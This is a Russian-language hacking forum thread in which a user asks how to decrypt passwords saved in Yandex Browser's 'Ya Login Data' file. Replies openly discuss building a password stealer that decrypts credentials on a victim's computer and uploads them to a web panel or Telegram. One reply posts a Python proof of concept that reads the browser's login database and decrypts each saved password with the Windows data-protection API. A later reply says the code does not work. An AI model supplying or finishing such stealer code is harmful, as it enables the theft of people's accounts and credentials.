Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

Как расшифровать?

Girl
Пользователь
Пользователь
Статус
Оффлайн
Регистрация
11 Ноя 2019
Сообщения
294
Реакции
46
Как расшифровать пароли от Yandex? Из файла Ya Login Data.
 
Из куков?
Или из Яндекс.Браузера?
 
Из куков?
Или из Яндекс.Браузера?
Не понял вопроса.
В Ya Login Data хранятся все пароли, которые сохранил пользователь, но браузер их шифрует, мне нужно расшифровать их.
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Не понял вопроса.
В Ya Login Data хранятся все пароли, которые сохранил пользователь, но браузер их шифрует, мне нужно расшифровать их.
Принять ислам. Вроде никак нельзя
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Как расшифровать пароли от Yandex? Из файла Ya Login Data.
их можно расшифровать только на пк где их зашифровали.
Соответственно если ты делаешь стиллер то, он должен собирать пароли расшифровывать их, сохранять, и загружать на веб панель либо в тг
 
ну браузер же как то шифрует и расшифровывает = можно расшифровать, только хзкак
Мастер-ключ рандомный и хранится на пк (где не ебу, толи привязан к профилю пользователя windows, толи как-то ещё). В metasploit’e есть модуль для стилла и дешифровки паролей хрома (яндекс = хромиум), но работает он только на пк жертвы.
 
Вроде никак нельзя
Можно все.

расшифровывать их
Я и задал вопрос, как?

толи привязан к профилю пользователя windows
Что бы получить мастер-ключ, надо вроде бы ввести пароль от юзера, так что наверное да.

хрома (яндекс = хромиум)
Яндекс = хромиум, Яндекс != хром.
Расшифровать от хрома я могу, яндекса - нет.

но работает он только на пк жертвы
Это не проблема, вопрос остается таким же.
 
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
Expand Collapse Copy
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
Expand Collapse Copy
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
кто то ещё пользуется питоном?
 
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
Expand Collapse Copy
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
Не работает, или я идиот, который не пишет на python.
1586714714473.png
 
Назад
Сверху Снизу